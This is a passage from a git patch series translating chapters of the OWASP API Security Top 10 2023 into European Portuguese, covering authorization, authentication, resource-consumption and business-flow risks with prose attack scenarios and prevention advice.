to keep bandwidth consumption low. The cache service only caches files -up to 15GB. +Um prestador de serviços permite que os clientes descarreguem ficheiros +arbitrariamente grandes através da sua API. Estes ficheiros são mantidos em +armazenamento de objetos na nuvem e não mudam com frequência. O prestador de +serviços depende de um serviço de _cache_ para melhorar a velocidade do serviço e +manter o consumo de largura de banda baixo. O serviço de _cache_ apenas armazena +ficheiros até 15GB. -When one of the files gets updated, its size increases to 18GB. All service -clients immediately start pulling the new version. Because there were no -consumption cost alerts, nor a maximum cost allowance for the cloud service, -the next monthly bill increases from US$13, on average, to US$8k. +Quando um dos ficheiros é atualizado, o seu tamanho aumenta para 18GB. Todos os +clientes do serviço começam imediatamente a descarregar a nova versão. Como não +havia alertas de custo de consumo, nem um limite máximo de custo para o serviço +de nuvem, a fatura mensal seguinte aumenta de 13 dólares, em média, para 8 mil +dólares. ## Como Prevenir -* Use a solution that makes it easy to limit [memory][1], - [CPU][2], [number of restarts][3], [file descriptors, and processes][4] such - as Containers / Serverless code (e.g. Lambdas). -* Define and enforce a maximum size of data on all incoming parameters and - payloads, such as maximum length for strings, maximum number of elements in - arrays, and maximum upload file size (regardless of whether it is stored - locally or in cloud storage). -* Implement a limit on how often a client can interact with the API within a - defined timeframe (rate limiting). -* Rate limiting should be fine tuned based on the business needs. Some API - Endpoints might require stricter policies. -* Limit/throttle how many times or how often a single API client/user can - execute a single operation (e.g. validate an OTP, or request password - recovery without visiting the one-time URL). +* Utilize uma solução que facilite a limitação de [memória][1], [CPU][2], + [número de reinícios][3], [descritores de ficheiros e processos][4], como + Containers / Código Serverless (por exemplo, Lambdas). +* Defina e force um tamanho máximo de dados em todos os parâmetros e conteúdos + de entrada, como comprimento máximo para _strings_, número máximo de elementos + em arrays e tamanho máximo de ficheiro para _upload_ (independentemente de + ser armazenado localmente ou na nuvem). +* Implemente um limite de frequência com que um cliente pode interagir com a + API dentro de um período temporal definido (_rate limiting_). +* A limitação de pedidos deve ser ajustada com base nas necessidades do negócio. + Alguns endpoints da API podem exigir políticas mais rigorosas. +* Limite/controle quantas vezes ou com que frequência um único cliente/utilizador + da API pode executar uma única operação (por exemplo, validar um OTP ou solicitar + a recuperação de senha sem visitar o URL de uso único). * Add proper server-side validation for query string and request body parameters, specifically the one that controls the number of records to be returned in the response. +* Adicione validação adequada no lado do servidor para parâmetros da _query string_ + e do corpo do pedido, especificamente aqueles que controlam o número de resultados + a serem retornados na resposta. * Configure spending limits for all service providers/API integrations. When setting spending limits is not possible, billing alerts should be configured instead. +* Configure limites de gastos para todos os fornecedores de serviços/integracões de + API. Quando não for possível definir limites de gastos, devem ser configurados + alertas de faturamento. ## Referências From 9043dc790de513d94ad428bf6614863fe1e64cc1 Mon Sep 17 00:00:00 2001 From: OWASP Disciple <11950757+RiuSalvi@users.noreply.github.com> Date: Fri, 17 May 2024 13:37:08 +0100 Subject: [PATCH 32/64] Update 0xa5-broken-function-level-authorization.md --- .../0xa5-broken-function-level-authorization.md | 16 ++++++++-------- 1 file changed, 8 insertions(+), 8 deletions(-) diff --git a/editions/2023/pt-pt/0xa5-broken-function-level-authorization.md b/editions/2023/pt-pt/0xa5-broken-function-level-authorization.md index 72f3b21cb..f5a97d938 100644 --- a/editions/2023/pt-pt/0xa5-broken-function-level-authorization.md +++ b/editions/2023/pt-pt/0xa5-broken-function-level-authorization.md @@ -3,9 +3,9 @@ | Agentes Ameaça/Vetores Ataque | Falha Segurança | Impactos | | - | - | - | | Específico da API : Abuso **Fácil** | Prevalência **Comum** : Deteção **Fácil** | Técnico **Grave** : Específico Negócio | -| Exploitation requires the attacker to send legitimate API calls to an API endpoint that they should not have access to as anonymous users or regular, non-privileged users. Exposed endpoints will be easily exploited. | Authorization checks for a function or resource are usually managed via configuration or code level. Implementing proper checks can be a confusing task since modern applications can contain many types of roles, groups, and complex user hierarchies (e.g. sub-users, or users with more than one role). It's easier to discover these flaws in APIs since APIs are more structured, and accessing different functions is more predictable. | Such flaws allow attackers to access unauthorized functionality. Administrative functions are key targets for this type of attack and may lead to data disclosure, data loss, or data corruption. Ultimately, it may lead to service disruption. | +| Para abusar deste tipo de falha o atacante tem de realizar pedidos legítimos ao _endpoint_ da API ao qual não é suposto ter acesso como utilizadores anónimos, ordinários ou não privilegiados. _Endpoints_ expostos serão facilmente explorados. | As verificações de autorização para aceder a uma determinada função ou recurso são normalmente geridas por configuração ou ao nível da implementação. A correta implementação destes mecanismos pode tornar-se confusa, uma vez que, as aplicações modernas prevêem vários perfis ou grupos de utilizador, assim como complexos esquemas de hierarquias (e.g., sub-utilizadores, utilizadores com mais do que um perfil). É mais fácil descobrir estas falhas em APIs dado que APIs são mais estruturadas, e aceder a diferentes funções é mais previsível. | Estas falhas permitem aos atacantes aceder de forma não autorizada a certas funcionalidades. As funcionalidades administrativas são o alvo preferencial neste tipo de ataqueo que pode levar a divulgação de dados, perda de dados, ou corrupção de dados. Por último, pode dar aso a uma disrupção de serviço. | -## Is the API Vulnerable? +## A API é vulnerável? The best way to find broken function level authorization issues is to perform a deep analysis of the authorization mechanism while keeping in mind the user @@ -28,9 +28,9 @@ under a specific relative path, like `/api/admins`, it's very common to find these administrative endpoints under other relative paths together with regular endpoints, like `/api/users`. -## Example Attack Scenarios +## Exemplos de Cenários de Ataque -### Scenario #1 +### Cenário #1 During the registration process for an application that allows only invited users to join, the mobile application triggers an API call to @@ -56,7 +56,7 @@ POST /api/invites/new Later on, the attacker uses the maliciously crafted invite in order to create themselves an admin account and gain full access to the system. -### Scenario #2 +### Cenário #2 An API contains an endpoint that should be exposed only to administrators - `GET /api/admin/v1/users/all`. This endpoint returns the details of all the @@ -65,7 +65,7 @@ checks. An attacker who learned the API structure takes an educated guess and manages to access this endpoint, which exposes sensitive details of the users of the application. -## How To Prevent +## Como Prevenir Your application should have a consistent and easy-to-analyze authorization module that is invoked from all your business functions. Frequently, such @@ -82,7 +82,7 @@ code. * Make sure that administrative functions inside a regular controller implement authorization checks based on the user's group and role. -## References +## Referências ### OWASP @@ -90,7 +90,7 @@ code. * "A7: Missing Function Level Access Control", [OWASP Top 10 2013][2] * [Access Control][3] -### External +### Externas * [CWE-285: Improper Authorization][4] From b3d7792ac950fd393e029122d39289a9699b685e Mon Sep 17 00:00:00 2001 From: OWASP Disciple <11950757+RiuSalvi@users.noreply.github.com> Date: Fri, 17 May 2024 14:03:34 +0100 Subject: [PATCH 33/64] Update 0xa5-broken-function-level-authorization.md --- ...xa5-broken-function-level-authorization.md | 40 +++++++++---------- 1 file changed, 20 insertions(+), 20 deletions(-) diff --git a/editions/2023/pt-pt/0xa5-broken-function-level-authorization.md b/editions/2023/pt-pt/0xa5-broken-function-level-authorization.md index f5a97d938..9009091af 100644 --- a/editions/2023/pt-pt/0xa5-broken-function-level-authorization.md +++ b/editions/2023/pt-pt/0xa5-broken-function-level-authorization.md @@ -7,26 +7,26 @@ ## A API é vulnerável? -The best way to find broken function level authorization issues is to perform -a deep analysis of the authorization mechanism while keeping in mind the user -hierarchy, different roles or groups in the application, and asking the -following questions: - -* Can a regular user access administrative endpoints? -* Can a user perform sensitive actions (e.g. creation, modification, or - deletion ) that they should not have access to by simply changing the HTTP - method (e.g. from `GET` to `DELETE`)? -* Can a user from group X access a function that should be exposed only to - users from group Y, by simply guessing the endpoint URL and parameters - (e.g. `/api/v1/users/export_all`)? - -Don't assume that an API endpoint is regular or administrative only based on -the URL path. - -While developers might choose to expose most of the administrative endpoints -under a specific relative path, like `/api/admins`, it's very common to find -these administrative endpoints under other relative paths together with regular -endpoints, like `/api/users`. +A melhor forma de identificar falhas de verificação de autorização de acesso a +funções é através duma análise detalhada do mecanismo de autorização, devendo +ter-se em consideração o esquema de hierarquia de utilizadores, diferentes +perfis ou grupos e questionando continuamente: + +* Utilizadores ordinários podem aceder aos _endpoints_ de administração? +* Os utilizadores podem realizar ações sensíveis (e.g. criar, modificar ou + apagar) para as quais não deveriam ter acesso, alterando simplesmente o método + HTTP (e.g. alterando de `GET` para `DELETE`)? +* Um utilizador do grupo X pode aceder a uma função reservada ao grupo Y, + adivinhando o URL do _endpoint_ e os parâmetros (e.g. + `/api/v1/users/export_all`)? + +Nunca assuma o tipo dum _endpoint_, normal ou administrativo, apenas com base no +URL. + +Apesar dos programadores poderem ter decidido expor a maioria dos _endpoints_ +administrativos sob um mesmo prefixo, e.g. `api/admins`, é comum encontrarem-se +_endpoints_ administrativos sob outros prefixos, misturados com _endpoints_ +ordinários e.g. `api/users`. ## Exemplos de Cenários de Ataque From 52befe9ec348e7689fd78dad491f0ac46be9e692 Mon Sep 17 00:00:00 2001 From: OWASP Disciple <11950757+RiuSalvi@users.noreply.github.com> Date: Fri, 17 May 2024 14:04:27 +0100 Subject: [PATCH 34/64] Update 0xa4-unrestricted-resource-consumption.md --- .../pt-pt/0xa4-unrestricted-resource-consumption.md | 10 +++++----- 1 file changed, 5 insertions(+), 5 deletions(-) diff --git a/editions/2023/pt-pt/0xa4-unrestricted-resource-consumption.md b/editions/2023/pt-pt/0xa4-unrestricted-resource-consumption.md index 6c8fd6a9e..b1cbaa202 100644 --- a/editions/2023/pt-pt/0xa4-unrestricted-resource-consumption.md +++ b/editions/2023/pt-pt/0xa4-unrestricted-resource-consumption.md @@ -3,7 +3,7 @@ | Agentes Ameaça/Vetores Ataque | Falha Segurança | Impactos | | - | - | - | | Específico da API : Abuso **Moderado** | Prevalência **Predominante** : Deteção **Fácil** | Técnico **Grave** : Específico Negócio | -| A exploração requer pedidos simples de API. Múltiplos pedidos concorrentes podem ser feitos a partir de um único computador local ou utilizando recursos de computação em nuvem. A maioria das ferramentas automatizadas disponíveis são projetadas para causar DoS (Negação de Serviço) através de altas cargas de tráfego, afetando a taxa de serviço das APIs. | É comum encontrar APIs que não limitam as interações do cliente ou o consumo de recursos. Pedidos de API elaborados, como aqueles que incluem parâmetros que controlam o número de recursos a serem retornados e realizam análises de estado/tempo/comprimento de resposta, devem permitir a identificação do problema. O mesmo vale para operações em quantidade. Embora os agentes maliciosos não tenham visibilidade sobre o impacto nos custos, isso pode ser inferido com base no modelo de negócios/preços dos fornecedores de serviços (por exemplo, fornecedor de nuvem). | A exploração pode levar a uma Negação de Serviço (DoS) devido à escassez de recursos, mas também pode resultar num aumento dos custos operacionais, como os relacionados à infraestrutura devido à maior exigência de CPU, aumento das necessidades de armazenamento em nuvem, etc. | +| A exploração requer pedidos simples de API. Múltiplos pedidos concorrentes podem ser feitos a partir de um único computador local ou utilizando recursos de computação em nuvem. A maioria das ferramentas automatizadas disponíveis são projetadas para causar DoS (Negação de Serviço) através de altas cargas de tráfego, afetando a taxa de serviço das APIs. | É comum encontrar APIs que não limitam as interações do cliente ou o consumo de recursos. Pedidos de API elaborados, como aqueles que incluem parâmetros que controlam o número de recursos a serem retornados e realizam análises de estado/tempo/comprimento de resposta, devem permitir a identificação do problema. O mesmo vale para operações em quantidade. Embora os agentes maliciosos não tenham visibilidade sobre o impacto nos custos, isso pode ser inferido com base no modelo de negócios/preços dos fornecedores de serviços (e.g. fornecedor de nuvem). | A exploração pode levar a uma Negação de Serviço (DoS) devido à escassez de recursos, mas também pode resultar num aumento dos custos operacionais, como os relacionados à infraestrutura devido à maior exigência de CPU, aumento das necessidades de armazenamento em nuvem, etc. | ## A API é vulnerável? @@ -14,7 +14,7 @@ e são pagos por pedido, como o envio de emails/SMS/chamadas telefónicas, validação biométrica, etc. Uma API é vulnerável se pelo menos um dos seguintes limites estiver ausente ou -definido inadequadamente (por exemplo, muito baixo/alto): +definido inadequadamente (e.g. muito baixo/alto): * Tempos limite de execução * Memória máxima alocável @@ -22,7 +22,7 @@ definido inadequadamente (por exemplo, muito baixo/alto): * Número máximo de processos * Tamanho máximo de upload de ficheiro * Número de operações a serem realizadas num único pedido do cliente da API - (por exemplo, agrupamento GraphQL) + (e.g. agrupamento GraphQL) * Número de registros por página a serem retornados num único pedido-resposta * Limite de gastos de provedores de serviços terceiros @@ -128,7 +128,7 @@ dólares. * Utilize uma solução que facilite a limitação de [memória][1], [CPU][2], [número de reinícios][3], [descritores de ficheiros e processos][4], como - Containers / Código Serverless (por exemplo, Lambdas). + Containers / Código Serverless (e.g. Lambdas). * Defina e force um tamanho máximo de dados em todos os parâmetros e conteúdos de entrada, como comprimento máximo para _strings_, número máximo de elementos em arrays e tamanho máximo de ficheiro para _upload_ (independentemente de @@ -138,7 +138,7 @@ dólares. * A limitação de pedidos deve ser ajustada com base nas necessidades do negócio. Alguns endpoints da API podem exigir políticas mais rigorosas. * Limite/controle quantas vezes ou com que frequência um único cliente/utilizador - da API pode executar uma única operação (por exemplo, validar um OTP ou solicitar + da API pode executar uma única operação (e.g. validar um OTP ou solicitar a recuperação de senha sem visitar o URL de uso único). * Add proper server-side validation for query string and request body parameters, specifically the one that controls the number of records to be From f3518c1d4f9a19d3d80aa4bf5dc0606f7316f20d Mon Sep 17 00:00:00 2001 From: OWASP Disciple <11950757+RiuSalvi@users.noreply.github.com> Date: Fri, 17 May 2024 14:05:03 +0100 Subject: [PATCH 35/64] Update 0xa2-broken-authentication.md --- editions/2023/pt-pt/0xa2-broken-authentication.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/editions/2023/pt-pt/0xa2-broken-authentication.md b/editions/2023/pt-pt/0xa2-broken-authentication.md index 46525ca39..b8359f20e 100644 --- a/editions/2023/pt-pt/0xa2-broken-authentication.md +++ b/editions/2023/pt-pt/0xa2-broken-authentication.md @@ -103,7 +103,7 @@ de email da conta da vítima. * _Endpoints_ para recuperação de _password_ devem ser tratados como os _endpoints_ de _login_ no que diz respeito à proteção contra ataques de força bruta, limitação do número de pedidos e bloqueio de conta. -* Exija nova autenticação para operações sensíveis (por exemplo, alterar o +* Exija nova autenticação para operações sensíveis (e.g. alterar o endereço de email do proprietário da conta/número de telefone para autenticação de dois fatores). * Utilize a [OWASP Authentication Cheatsheet][1]. From 7ab91d4ecd0cffd35b4a18612cf105c6a135e017 Mon Sep 17 00:00:00 2001 From: OWASP Disciple <11950757+RiuSalvi@users.noreply.github.com> Date: Fri, 17 May 2024 14:05:28 +0100 Subject: [PATCH 36/64] Update 0xa1-broken-object-level-authorization.md --- editions/2023/pt-pt/0xa1-broken-object-level-authorization.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/editions/2023/pt-pt/0xa1-broken-object-level-authorization.md b/editions/2023/pt-pt/0xa1-broken-object-level-authorization.md index 15541ad14..4ef1fe3a8 100644 --- a/editions/2023/pt-pt/0xa1-broken-object-level-authorization.md +++ b/editions/2023/pt-pt/0xa1-broken-object-level-authorization.md @@ -19,7 +19,7 @@ permissões para realizar a ação solicitada sobre o objeto alvo. As falhas neste mecanismo geralmente conduzem à divulgação não autorizada de informações, modificação ou destruição de todos os dados. -Comparar o ID do utilizador da sessão atual (por exemplo, ao extraí-lo do +Comparar o ID do utilizador da sessão atual (e.g. ao extraí-lo do token JWT) com o parâmetro de ID vulnerável não é uma solução suficiente para resolver a falha de Broken Object Level Authorization (BOLA). Esta abordagem pode endereçar apenas um pequeno subconjunto de casos. From fe4b3e55bcc181cf8901f5f0ad9ab5321b200845 Mon Sep 17 00:00:00 2001 From: OWASP Disciple <11950757+RiuSalvi@users.noreply.github.com> Date: Fri, 17 May 2024 14:05:50 +0100 Subject: [PATCH 37/64] Update 0xa5-broken-function-level-authorization.md --- editions/2023/pt-pt/0xa5-broken-function-level-authorization.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/editions/2023/pt-pt/0xa5-broken-function-level-authorization.md b/editions/2023/pt-pt/0xa5-broken-function-level-authorization.md index 9009091af..9c2d47673 100644 --- a/editions/2023/pt-pt/0xa5-broken-function-level-authorization.md +++ b/editions/2023/pt-pt/0xa5-broken-function-level-authorization.md @@ -3,7 +3,7 @@ | Agentes Ameaça/Vetores Ataque | Falha Segurança | Impactos | | - | - | - | | Específico da API : Abuso **Fácil** | Prevalência **Comum** : Deteção **Fácil** | Técnico **Grave** : Específico Negócio | -| Para abusar deste tipo de falha o atacante tem de realizar pedidos legítimos ao _endpoint_ da API ao qual não é suposto ter acesso como utilizadores anónimos, ordinários ou não privilegiados. _Endpoints_ expostos serão facilmente explorados. | As verificações de autorização para aceder a uma determinada função ou recurso são normalmente geridas por configuração ou ao nível da implementação. A correta implementação destes mecanismos pode tornar-se confusa, uma vez que, as aplicações modernas prevêem vários perfis ou grupos de utilizador, assim como complexos esquemas de hierarquias (e.g., sub-utilizadores, utilizadores com mais do que um perfil). É mais fácil descobrir estas falhas em APIs dado que APIs são mais estruturadas, e aceder a diferentes funções é mais previsível. | Estas falhas permitem aos atacantes aceder de forma não autorizada a certas funcionalidades. As funcionalidades administrativas são o alvo preferencial neste tipo de ataqueo que pode levar a divulgação de dados, perda de dados, ou corrupção de dados. Por último, pode dar aso a uma disrupção de serviço. | +| Para abusar deste tipo de falha o atacante tem de realizar pedidos legítimos ao _endpoint_ da API ao qual não é suposto ter acesso como utilizadores anónimos, ordinários ou não privilegiados. _Endpoints_ expostos serão facilmente explorados. | As verificações de autorização para aceder a uma determinada função ou recurso são normalmente geridas por configuração ou ao nível da implementação. A correta implementação destes mecanismos pode tornar-se confusa, uma vez que, as aplicações modernas prevêem vários perfis ou grupos de utilizador, assim como complexos esquemas de hierarquias (e.g. sub-utilizadores, utilizadores com mais do que um perfil). É mais fácil descobrir estas falhas em APIs dado que APIs são mais estruturadas, e aceder a diferentes funções é mais previsível. | Estas falhas permitem aos atacantes aceder de forma não autorizada a certas funcionalidades. As funcionalidades administrativas são o alvo preferencial neste tipo de ataqueo que pode levar a divulgação de dados, perda de dados, ou corrupção de dados. Por último, pode dar aso a uma disrupção de serviço. | ## A API é vulnerável? From 893192c9781838a30f3225b8c1cf5b9f057a707d Mon Sep 17 00:00:00 2001 From: Hack Disciple <11950757+RiuSalvi@users.noreply.github.com> Date: Mon, 20 May 2024 10:42:56 +0100 Subject: [PATCH 38/64] Update 0xa5-broken-function-level-authorization.md --- ...xa5-broken-function-level-authorization.md | 59 +++++++++++-------- 1 file changed, 34 insertions(+), 25 deletions(-) diff --git a/editions/2023/pt-pt/0xa5-broken-function-level-authorization.md b/editions/2023/pt-pt/0xa5-broken-function-level-authorization.md index 9c2d47673..234e010a1 100644 --- a/editions/2023/pt-pt/0xa5-broken-function-level-authorization.md +++ b/editions/2023/pt-pt/0xa5-broken-function-level-authorization.md @@ -32,17 +32,17 @@ ordinários e.g. `api/users`. ### Cenário #1 -During the registration process for an application that allows only invited -users to join, the mobile application triggers an API call to -`GET /api/invites/{invite_guid}`. The response contains a JSON with details -about the invite, including the user's role and the user's email. +Durante o processo de registo para uma aplicação que permite apenas a adesão +de utilizadores convidados, a aplicação móvel faz uma chamada de API para +`GET /api/invites/{invite_guid}`. A resposta contém um JSON com detalhes sobre +o convite, incluindo o perfil do utilizador e o email do utilizador. -An attacker duplicates the request and manipulates the HTTP method and endpoint -to `POST /api/invites/new`. This endpoint should only be accessed by -administrators using the admin console. The endpoint does not implement -function level authorization checks. +Um atacante duplica o pedido e manipula o método HTTP e o _endpoint_ para +`POST /api/invites/new`. Este _endpoint_ deveria ser usado apenas por +administradores através da consola de administração. O _endpoint_ não implementa +verificações de autorização de acesso à função. -The attacker exploits the issue and sends a new invite with admin privileges: +O atacante explora a falha e envia um novo convite com privilégios de administrador: ``` POST /api/invites/new @@ -53,8 +53,8 @@ POST /api/invites/new } ``` -Later on, the attacker uses the maliciously crafted invite in order to create -themselves an admin account and gain full access to the system. +Mais tarde, o atacante usa o convite criado maliciosamente para criar uma conta +de administrador e obter acesso total ao sistema. ### Cenário #2 @@ -65,22 +65,31 @@ checks. An attacker who learned the API structure takes an educated guess and manages to access this endpoint, which exposes sensitive details of the users of the application. +Uma API contém um _endpoint_ que deveria ser exposto apenas a administradores - +`GET /api/admin/v1/users/all`. Este _endpoint_ retorna os detalhes de todos os +utilizadores da aplicação e não implementa verificações de autorização de acesso +à função. Um atacante que aprendeu sobre a estrutura da API faz uma suposição +informada e consegue aceder a este _endpoint_, expondo detalhes sensíveis dos +utilizadores da aplicação. + ## Como Prevenir -Your application should have a consistent and easy-to-analyze authorization -module that is invoked from all your business functions. Frequently, such -protection is provided by one or more components external to the application -code. - -* The enforcement mechanism(s) should deny all access by default, requiring - explicit grants to specific roles for access to every function. -* Review your API endpoints against function level authorization flaws, while - keeping in mind the business logic of the application and groups hierarchy. -* Make sure that all of your administrative controllers inherit from an - administrative abstract controller that implements authorization checks - based on the user's group/role. -* Make sure that administrative functions inside a regular controller implement - authorization checks based on the user's group and role. +A sua API deve usar um módulo de autorização consistente e fácil de analisar, o +qual deve ser invocado por todas as funções de negócio. Frequentemente, este +tipo de proteção é oferecido por um ou mais componentes externos à lógica +aplicacional. + +* Por omissão todos os acesso devem ser negados, exigindo que permissões + específicas sejam concedidas a perfis específicos para acesso a cada função. +* Rever todos os _endpoints_ à procura de falhas ao nível da verificação de + autorização de acesso a funções, tendo sempre em consideração a lógica de + negócio da aplicação e hierarquia dos grupos. +* Assegurar que todos os controladores administrativos herdam de um controlador + administrativo base que implementa as verificações de autorização com base no + grupo/perfil do utilizador. +* Assegurar que funções administrativas num controlador ordinário implementam + elas próprias as verificações de autorização baseadas no grupo e perfil do + utilizador. ## Referências From d05941f7715f13dfa599df86ff90cad67d66a8a6 Mon Sep 17 00:00:00 2001 From: Hack Disciple <11950757+RiuSalvi@users.noreply.github.com> Date: Mon, 20 May 2024 10:47:04 +0100 Subject: [PATCH 39/64] Update 0xa6-unrestricted-access-to-sensitive-business-flows.md --- ...icted-access-to-sensitive-business-flows.md | 18 +++++++++--------- 1 file changed, 9 insertions(+), 9 deletions(-) diff --git a/editions/2023/pt-pt/0xa6-unrestricted-access-to-sensitive-business-flows.md b/editions/2023/pt-pt/0xa6-unrestricted-access-to-sensitive-business-flows.md index 46956d1f4..dfbac78b0 100644 --- a/editions/2023/pt-pt/0xa6-unrestricted-access-to-sensitive-business-flows.md +++ b/editions/2023/pt-pt/0xa6-unrestricted-access-to-sensitive-business-flows.md @@ -1,11 +1,11 @@ # API6:2023 Unrestricted Access to Sensitive Business Flows -| Threat agents/Attack vectors | Security Weakness | Impacts | +| Agentes Ameaça/Vetores Ataque | Falha Segurança | Impactos | | - | - | - | -| API Specific : Exploitability **Easy** | Prevalence **Widespread** : Detectability **Average** | Technical **Moderate** : Business Specific | +| Específico da API : Abuso **Fácil** | Prevalência **Predominante** : Deteção **Moderado** | Técnico **Moderado** : Específico Negócio | | Exploitation usually involves understanding the business model backed by the API, finding sensitive business flows, and automating access to these flows, causing harm to the business. | Lack of a holistic view of the API in order to fully support business requirements tends to contribute to the prevalence of this issue. Attackers manually identify what resources (e.g. endpoints) are involved in the target workflow and how they work together. If mitigation mechanisms are already in place, attackers need to find a way to bypass them. | In general technical impact is not expected. Exploitation might hurt the business in different ways, for example: prevent legitimate users from purchasing a product, or lead to inflation in the internal economy of a game. | -## Is the API Vulnerable? +## A API é vulnerável? When creating an API Endpoint, it is important to understand which business flow it exposes. Some business flows are more sensitive than others, in the sense @@ -27,9 +27,9 @@ spam by one social network, but encouraged by another social network. An API Endpoint is vulnerable if it exposes a sensitive business flow, without appropriately restricting the access to it. -## Example Attack Scenarios +## Exemplos de Cenários de Ataque -### Scenario #1 +### Cenário #1 A technology company announces they are going to release a new gaming console on Thanksgiving. The product has a very high demand and the stock is limited. An @@ -44,7 +44,7 @@ users. Later on, the attacker sells the product on another platform for a much higher price. -### Scenario #2 +### Cenário #2 An airline company offers online ticket purchasing with no cancellation fee. A user with malicious intentions books 90% of the seats of a desired flight. @@ -56,7 +56,7 @@ the flight. At this point, the user buys herself a single ticket that is much cheaper than the original one. -### Scenario #3 +### Cenário #3 A ride-sharing app provides a referral program - users can invite their friends and gain credit for each friend who has joined the app. This credit can be later @@ -68,7 +68,7 @@ process, with each new user adding credit to the attacker's wallet. The attacker can later enjoy free rides or sell the accounts with excessive credits for cash. -## How To Prevent +## Como Prevenir The mitigation planning should be done in two layers: @@ -95,7 +95,7 @@ The mitigation planning should be done in two layers: as developer and B2B APIs). They tend to be an easy target for attackers because they often don't implement all the required protection mechanisms. -## References +## Referências ### OWASP From e9fce924ceb721d328266a616a5c82385ed58b86 Mon Sep 17 00:00:00 2001 From: Hack Disciple <11950757+RiuSalvi@users.noreply.github.com> Date: Mon, 20 May 2024 11:04:06 +0100 Subject: [PATCH 40/64] Update 0xa6-unrestricted-access-to-sensitive-business-flows.md --- ...cted-access-to-sensitive-business-flows.md | 32 +++++++++---------- 1 file changed, 16 insertions(+), 16 deletions(-) diff --git a/editions/2023/pt-pt/0xa6-unrestricted-access-to-sensitive-business-flows.md b/editions/2023/pt-pt/0xa6-unrestricted-access-to-sensitive-business-flows.md index dfbac78b0..a96c4ec12 100644 --- a/editions/2023/pt-pt/0xa6-unrestricted-access-to-sensitive-business-flows.md +++ b/editions/2023/pt-pt/0xa6-unrestricted-access-to-sensitive-business-flows.md @@ -3,29 +3,29 @@ | Agentes Ameaça/Vetores Ataque | Falha Segurança | Impactos | | - | - | - | | Específico da API : Abuso **Fácil** | Prevalência **Predominante** : Deteção **Moderado** | Técnico **Moderado** : Específico Negócio | -| Exploitation usually involves understanding the business model backed by the API, finding sensitive business flows, and automating access to these flows, causing harm to the business. | Lack of a holistic view of the API in order to fully support business requirements tends to contribute to the prevalence of this issue. Attackers manually identify what resources (e.g. endpoints) are involved in the target workflow and how they work together. If mitigation mechanisms are already in place, attackers need to find a way to bypass them. | In general technical impact is not expected. Exploitation might hurt the business in different ways, for example: prevent legitimate users from purchasing a product, or lead to inflation in the internal economy of a game. | +| A exploração geralmente envolve entender o modelo de negócio suportado pela API, encontrar fluxos de negócio sensíveis e automatizar o acesso a esses fluxos, causando danos ao negócio. | A falta de uma visão holística da API para suportar plenamente os requisitos de negócio tende a contribuir para a prevalência deste problema. Os atacantes identificam manualmente quais recursos (e.g. _endpoints_) estão envolvidos no fluxo de trabalho alvo e como funcionam em conjunto. Se já existirem mecanismos de mitigação, os atacantes precisam encontrar uma maneira de os contornar. | Em geral, não se espera um impacto técnico significativo. A exploração pode prejudicar o negócio de diferentes maneiras, por exemplo: impedir que utilizadores legítimos comprem um produto ou levar a uma inflação na economia interna de um jogo. | ## A API é vulnerável? -When creating an API Endpoint, it is important to understand which business flow -it exposes. Some business flows are more sensitive than others, in the sense -that excessive access to them may harm the business. +Ao criar um _endpoint_ de API, é importante entender qual fluxo de negócio ele +expõe. Alguns fluxos de negócio são mais sensíveis do que outros, no sentido de +que o acesso excessivo a eles pode prejudicar o negócio. -Common examples of sensitive business flows and risk of excessive access -associated with them: +Exemplos comuns de fluxos de negócios sensíveis e o risco de acesso excessivo +associado a eles: -* Purchasing a product flow - an attacker can buy all the stock of a high-demand - item at once and resell for a higher price (scalping) -* Creating a comment/post flow - an attacker can spam the system -* Making a reservation - an attacker can reserve all the available time slots - and prevent other users from using the system +* Fluxo de compra de um produto - um atacante pode comprar todo o stock de um + item de alta procura de uma só vez e revendê-lo por um preço mais alto (scalping). +* Fluxo de criação de comentário/publicação - um atacante pode inundar o sistema com spam. +* Realização de uma reserva - um atacante pode reservar todos os horários disponíveis + e impedir que outros utilizadores utilizem o sistema. -The risk of excessive access might change between industries and businesses. -For example - creation of posts by a script might be considered as a risk of -spam by one social network, but encouraged by another social network. +O risco de acesso excessivo pode variar entre indústrias e empresas. Por exemplo, a +criação de publicações através de um script pode ser considerada um risco de spam por +uma rede social, mas incentivada por outra rede social. -An API Endpoint is vulnerable if it exposes a sensitive business flow, without -appropriately restricting the access to it. +Um endpoint de API está vulnerável se expõe um fluxo de negócio sensível sem restringir +adequadamente o acesso a ele. ## Exemplos de Cenários de Ataque From db5b5a252aa8c65488968ee6954e7fb772f212fd Mon Sep 17 00:00:00 2001 From: Hack Disciple <11950757+RiuSalvi@users.noreply.github.com> Date: Mon, 27 May 2024 17:43:20 +0100 Subject: [PATCH 41/64] Update 0xa6-unrestricted-access-to-sensitive-business-flows.md --- ...cted-access-to-sensitive-business-flows.md | 99 ++++++++++--------- 1 file changed, 51 insertions(+), 48 deletions(-) diff --git a/editions/2023/pt-pt/0xa6-unrestricted-access-to-sensitive-business-flows.md b/editions/2023/pt-pt/0xa6-unrestricted-access-to-sensitive-business-flows.md index a96c4ec12..ef321c8bb 100644 --- a/editions/2023/pt-pt/0xa6-unrestricted-access-to-sensitive-business-flows.md +++ b/editions/2023/pt-pt/0xa6-unrestricted-access-to-sensitive-business-flows.md @@ -31,69 +31,72 @@ adequadamente o acesso a ele. ### Cenário #1 -A technology company announces they are going to release a new gaming console on -Thanksgiving. The product has a very high demand and the stock is limited. An -attacker writes code to automatically buy the new product and complete the -transaction. +Uma empresa de tecnologia anuncia que vai lançar uma nova consola de jogos no Dia +de Ação de Graças. O produto tem uma procura muito alta e o stock é limitado. Um +atacante escreve código para comprar automaticamente o novo produto e concluir a +transação. -On the release day, the attacker runs the code distributed across different IP -addresses and locations. The API doesn't implement the appropriate protection -and allows the attacker to buy the majority of the stock before other legitimate -users. +No dia do lançamento, o atacante executa o código distribuído por diferentes +endereços IP e localizações. A API não implementa a proteção adequada e permite +que o atacante compre a maior parte do stock antes de outros utilizadores +legítimos. -Later on, the attacker sells the product on another platform for a much higher -price. +Mais tarde, o atacante vende o produto noutra plataforma por um preço muito mais +alto. ### Cenário #2 -An airline company offers online ticket purchasing with no cancellation fee. A -user with malicious intentions books 90% of the seats of a desired flight. +Uma companhia aérea oferece a compra de bilhetes online sem taxa de cancelamento. +Um utilizador com intenções maliciosas reserva 90% dos assentos de um voo desejado. -A few days before the flight the malicious user canceled all the tickets at -once, which forced the airline to discount the ticket prices in order to fill -the flight. +Alguns dias antes do 